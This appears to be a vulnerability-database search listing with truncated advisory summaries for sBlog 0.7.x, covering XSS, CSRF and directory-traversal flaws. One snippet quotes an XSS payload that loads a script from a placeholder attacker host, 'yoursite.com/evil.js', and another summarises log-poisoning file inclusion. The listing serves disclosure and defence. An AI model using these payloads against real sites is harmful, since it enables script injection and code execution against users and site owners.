46 matches found
EUVD-2007-5788
Malware in sbrugna...
EUVD-2006-2190
Malware in sbrugna...
EUVD-2006-0109
Malware in sbrugna...
EUVD-2006-1139
Malware in sbrugna...
EUVD-2007-1795
Malware in sbrugna...
EUVD-2007-4086
Malware in sbrugna...
sBlog 0.7.2 search.php keyword Variable POST Method XSS
No description provided by source. source: http://www.securityfocus.com/bid/17044/info sBlog is prone to HTML-injection vulnerabilities. The application fails to properly sanitize user-supplied input before using it in dynamically generated content. Attacker-supplied HTML and script code would be...
sBlog 0.7.2 comments_do.php Multiple Variable POST Method XSS
No description provided by source. source: http://www.securityfocus.com/bid/17044/info sBlog is prone to HTML-injection vulnerabilities. The application fails to properly sanitize user-supplied input before using it in dynamically generated content. Attacker-supplied HTML and script code would be...
CVE-2007-5818
Cross-site request forgery (CSRF) vulnerability in blocks_edit_do.php in sBlog 0.7.3 Beta allows remote attackers to change arbitrary blocks as administrators...
Cross site request forgery (csrf)
Cross-site request forgery (CSRF) vulnerability in blocks_edit_do.php in sBlog 0.7.3 Beta allows remote attackers to change arbitrary blocks as administrators...
CVE-2007-5818
The vulnerability affects sBlog 0.7.3 Beta, specifically the blocks_edit_do.php handler, where a cross-site request forgery (CSRF) could allow an attacker to change arbitrary blocks as an administrator. The description states the risk as enabling an attacker to perform admin-level changes via CSR...
CVE-2007-5818
Cross-site request forgery (CSRF) vulnerability in blocks_edit_do.php in sBlog 0.7.3 Beta allows remote attackers to change arbitrary blocks as administrators...
sBlog 0.7.3 Beta Cross Site Request Forgery
Product: sBlog; Version: 0.7.3 Beta; Website: http://www.sblog.se; Author: 0x90; Homepage: WwW.0x90.CoM.Ar; Contact: Gunsat0x90dotcomdotar; Problem: Cross Site Request Forgery Vulnerability; Summary: sBlog has, by default, no CSRF protection, this may allow an...
CVE-2007-4102
Cross-site scripting (XSS) vulnerability in search.php for sBlog 0.7.3 Beta allows remote attackers to inject arbitrary HTML and web script via a leading '"/> sequence in the search string...
Cross site scripting
Cross-site scripting (XSS) vulnerability in search.php for sBlog 0.7.3 Beta allows remote attackers to inject arbitrary HTML and web script via a leading '"/> sequence in the search string...
CVE-2007-4102
The CVE-2007-4102 entry describes a Cross-site Scripting (XSS) flaw in sBlog 0.7.3 Beta, specifically in search.php. The vulnerability allows remote attackers to inject arbitrary HTML and script via a leading '"/> sequence in the search string. Impact is stated as HTML/script injection without...
sblog073-xss.txt
sBlog 0.7.3 Beta XSS Vulnerability Found by 0x90 www.0x90.com.ar msn & mail: [email protected] in blog http://host/blog/search.php use '"/ Welcome to the jungle!...
sBlog 0.7.3 Beta XSS Vulnerability
sBlog 0.7.3 Beta XSS Vulnerability Found by 0x90 www.0x90.com.ar msn & mail: [email protected] in blog http://host/blog/search.php use "//script src=http://yoursite.com/evil.js Welcome to the jungle!...
Directory traversal
Directory traversal vulnerability in inc/lang.php in sBLOG 0.7.3 Beta allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the conf_lang_default parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by...
CVE-2007-1801
Directory traversal vulnerability in inc/lang.php in sBLOG 0.7.3 Beta allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the conf_lang_default parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by...